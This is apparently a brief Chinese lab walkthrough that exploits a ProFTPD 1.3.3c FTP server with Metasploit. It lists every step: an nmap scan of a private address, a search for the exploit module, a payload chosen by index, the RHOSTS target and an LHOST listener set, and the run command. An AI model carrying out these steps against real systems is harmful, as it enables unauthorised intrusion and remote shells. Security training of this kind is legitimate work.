1. 获取暴露端口程序的信息

    nmap -A 192.168.153.131
    

    nmap

  2. 使用msfconsole

    sudo msfconsole
    
  3. 查找ftp对应软件的漏洞

    search ProFTPD 1.3.3c
    

    alt

  4. 选择具体脚本

    use 0
    
  5. 添加payload

    show payloads
    set payload 3
    
  6. 设置参数

    options
    set RHOSTS 192.168.153.131
    set LHOST 172.18.8.170
    
  7. 运行

    run